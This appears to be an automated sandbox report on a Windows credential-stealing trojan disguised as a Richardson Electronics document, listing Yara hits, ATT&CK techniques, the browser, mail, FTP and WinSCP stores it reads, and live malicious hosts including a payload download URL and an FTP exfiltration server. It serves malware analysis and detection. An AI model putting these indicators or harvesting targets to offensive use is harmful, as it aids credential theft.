                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeQueries volume information: C:\Users\user\AppData\Roaming\Eggdjjrhey.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeQueries volume information: C:\Users\user\AppData\Roaming\Eggdjjrhey.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3e24a70.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3e24a70.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000003.00000002.2362069803.000000000361D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.2418121035.000000000289E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.3390128191.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2195447093.0000000003E0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2416647323.0000000002A89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.2330100397.0000000002B5E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2195447093.0000000003EBD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2449682974.000000000391B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.2418121035.000000000285C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.2327778523.00000000027F4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.2322422336.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2177833444.00000000030F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.3390128191.0000000002F0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.2330100397.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Richardson Electronics, LTD. PRD10221301UUE.exe PID: 2896, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7164, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Eggdjjrhey.exe PID: 936, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3748, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Eggdjjrhey.exe PID: 7152, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6092, type: MEMORYSTR
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\FTP Navigator\Ftplist.txt
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                        Source: Yara matchFile source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3e24a70.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3e24a70.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000003.00000002.2362069803.000000000361D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2195447093.0000000003E0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2416647323.0000000002A89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2195447093.0000000003EBD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2449682974.000000000391B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.2418121035.000000000285C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.2327778523.00000000027F4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.2322422336.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2177833444.00000000030F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.2330100397.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Richardson Electronics, LTD. PRD10221301UUE.exe PID: 2896, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7164, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Eggdjjrhey.exe PID: 936, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3748, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Eggdjjrhey.exe PID: 7152, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6092, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3e24a70.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3e24a70.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000003.00000002.2362069803.000000000361D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.2418121035.000000000289E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.3390128191.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2195447093.0000000003E0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2416647323.0000000002A89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.2330100397.0000000002B5E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2195447093.0000000003EBD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2449682974.000000000391B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.2418121035.000000000285C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.2327778523.00000000027F4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.2322422336.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2177833444.00000000030F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.3390128191.0000000002F0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.2330100397.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Richardson Electronics, LTD. PRD10221301UUE.exe PID: 2896, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7164, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Eggdjjrhey.exe PID: 936, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3748, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Eggdjjrhey.exe PID: 7152, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6092, type: MEMORYSTR
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                        Windows Management Instrumentation
                        1
                        DLL Side-Loading
                        1
                        DLL Side-Loading
                        1
                        Disable or Modify Tools
                        2
                        OS Credential Dumping
                        1
                        File and Directory Discovery
                        Remote Services11
                        Archive Collected Data
                        1
                        Ingress Tool Transfer
                        1
                        Exfiltration Over Alternative Protocol
                        Abuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Scheduled Task/Job
                        1
                        Scheduled Task/Job
                        311
                        Process Injection
                        1
                        Deobfuscate/Decode Files or Information
                        1
                        Input Capture
                        24
                        System Information Discovery
                        Remote Desktop Protocol2
                        Data from Local System
                        11
                        Encrypted Channel
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAt1
                        Registry Run Keys / Startup Folder
                        1
                        Scheduled Task/Job
                        2
                        Obfuscated Files or Information
                        1
                        Credentials in Registry
                        311
                        Security Software Discovery
                        SMB/Windows Admin Shares1
                        Email Collection
                        1
                        Non-Standard Port
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                        Registry Run Keys / Startup Folder
                        2
                        Software Packing
                        NTDS12
                        Virtualization/Sandbox Evasion
                        Distributed Component Object Model1
                        Input Capture
                        2
                        Non-Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        DLL Side-Loading
                        LSA Secrets1
                        Process Discovery
                        SSHKeylogging13
                        Application Layer Protocol
                        Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        Masquerading
                        Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                        Virtualization/Sandbox Evasion
                        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job311
                        Process Injection
                        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1520579 Sample: Richardson Electronics, LTD... Startdate: 27/09/2024 Architecture: WINDOWS Score: 100 30 wymascensores.com 2->30 32 ftp.alternatifplastik.com 2->32 46 Suricata IDS alerts for network traffic 2->46 48 Found malware configuration 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 10 other signatures 2->52 7 Richardson Electronics, LTD. PRD10221301UUE.exe 16 4 2->7         started        12 Eggdjjrhey.exe 14 2 2->12         started        14 Eggdjjrhey.exe 2 2->14         started        signatures3 process4 dnsIp5 34 wymascensores.com 67.212.175.162, 443, 49710, 49715 SINGLEHOP-LLCUS United States 7->34 24 C:\Users\user\AppData\...ggdjjrhey.exe, PE32 7->24 dropped 26 C:\Users\...ggdjjrhey.exe:Zone.Identifier, ASCII 7->26 dropped 54 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->54 56 Writes to foreign memory regions 7->56 58 Allocates memory in foreign processes 7->58 16 InstallUtil.exe 14 2 7->16         started        60 Multi AV Scanner detection for dropped file 12->60 62 Machine Learning detection for dropped file 12->62 64 Injects a PE file into a foreign processes 12->64 20 InstallUtil.exe 2 12->20         started        22 InstallUtil.exe 14->22         started        file6 signatures7 process8 dnsIp9 28 ftp.alternatifplastik.com 5.2.84.236, 21, 49712, 49713 ALASTYRTR Turkey 16->28 36 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 16->36 38 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 22->38 40 Tries to steal Mail credentials (via file / registry access) 22->40 42 Tries to harvest and steal ftp login credentials 22->42 44 Tries to harvest and steal browser information (history, passwords, etc) 22->44 signatures10

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        Richardson Electronics, LTD. PRD10221301UUE.exe29%ReversingLabsWin32.Trojan.Generic
                        Richardson Electronics, LTD. PRD10221301UUE.exe100%Joe Sandbox ML
                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Roaming\Eggdjjrhey.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Roaming\Eggdjjrhey.exe29%ReversingLabsWin32.Trojan.Generic
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        https://stackoverflow.com/q/14436606/233540%URL Reputationsafe
                        https://account.dyn.com/0%URL Reputationsafe
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                        https://stackoverflow.com/q/11564914/23354;0%URL Reputationsafe
                        https://stackoverflow.com/q/2152978/233540%URL Reputationsafe
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        wymascensores.com
                        67.212.175.162
                        truetrue
                          unknown
                          ftp.alternatifplastik.com
                          5.2.84.236
                          truetrue
                            unknown
                            NameMaliciousAntivirus DetectionReputation
                            https://wymascensores.com/john/Teoecc.wavtrue
                              unknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://github.com/mgravell/protobuf-netRichardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2202348780.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.0000000003F29000.00000004.00000800.00020000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.000000000474E000.00000004.00000800.00020000.00000000.sdmpfalse
                                unknown
                                https://github.com/mgravell/protobuf-netiRichardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2202348780.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.0000000003F29000.00000004.00000800.00020000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.000000000474E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  https://stackoverflow.com/q/14436606/23354Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2202348780.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2177833444.0000000002D88000.00000004.00000800.00020000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.0000000003F29000.00000004.00000800.00020000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.000000000474E000.00000004.00000800.00020000.00000000.sdmp, Eggdjjrhey.exe, 00000003.00000002.2327778523.00000000024E7000.00000004.00000800.00020000.00000000.sdmp, Eggdjjrhey.exe, 00000008.00000002.2416647323.0000000002851000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://account.dyn.com/Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.0000000003E0F000.00000004.00000800.00020000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.0000000003EBD000.00000004.00000800.00020000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2177833444.00000000030F3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2322422336.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Eggdjjrhey.exe, 00000003.00000002.2362069803.000000000361D000.00000004.00000800.00020000.00000000.sdmp, Eggdjjrhey.exe, 00000003.00000002.2327778523.00000000027F4000.00000004.00000800.00020000.00000000.sdmp, Eggdjjrhey.exe, 00000008.00000002.2416647323.0000000002A89000.00000004.00000800.00020000.00000000.sdmp, Eggdjjrhey.exe, 00000008.00000002.2449682974.000000000391B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://github.com/mgravell/protobuf-netJRichardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2202348780.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.0000000003F29000.00000004.00000800.00020000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.000000000474E000.00000004.00000800.00020000.00000000.sdmp, Eggdjjrhey.exe, 00000003.00000002.2362069803.0000000003EF4000.00000004.00000800.00020000.00000000.sdmp, Eggdjjrhey.exe, 00000008.00000002.2449682974.00000000041F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                    unknown
                                    https://wymascensores.comRichardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2177833444.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, Eggdjjrhey.exe, 00000003.00000002.2327778523.00000000024A1000.00000004.00000800.00020000.00000000.sdmp, Eggdjjrhey.exe, 00000008.00000002.2416647323.00000000027AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                      unknown
                                      https://wymascensores.com/john/Teoecc.wav%BufferRichardson Electronics, LTD. PRD10221301UUE.exe, Eggdjjrhey.exe.0.drfalse
                                        unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRichardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2177833444.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2330100397.0000000002B5E000.00000004.00000800.00020000.00000000.sdmp, Eggdjjrhey.exe, 00000003.00000002.2327778523.00000000024A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2418121035.000000000289E000.00000004.00000800.00020000.00000000.sdmp, Eggdjjrhey.exe, 00000008.00000002.2416647323.00000000027AC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.3390128191.0000000002F0E000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://stackoverflow.com/q/11564914/23354;Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2202348780.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.0000000003F29000.00000004.00000800.00020000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.000000000474E000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://stackoverflow.com/q/2152978/23354Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2202348780.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.0000000003F29000.00000004.00000800.00020000.00000000.sdmp, Richardson Electronics, LTD. PRD10221301UUE.exe, 00000000.00000002.2195447093.000000000474E000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://ftp.alternatifplastik.comInstallUtil.exe, 00000002.00000002.2330100397.0000000002B6C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2330100397.0000000002B5E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2418121035.000000000289E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2418121035.00000000028AC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.3390128191.0000000002F1C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.3390128191.0000000002F0E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          unknown
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          67.212.175.162
                                          wymascensores.comUnited States
                                          32475SINGLEHOP-LLCUStrue
                                          5.2.84.236
                                          ftp.alternatifplastik.comTurkey
                                          3188ALASTYRTRtrue
                                          Joe Sandbox version:41.0.0 Charoite
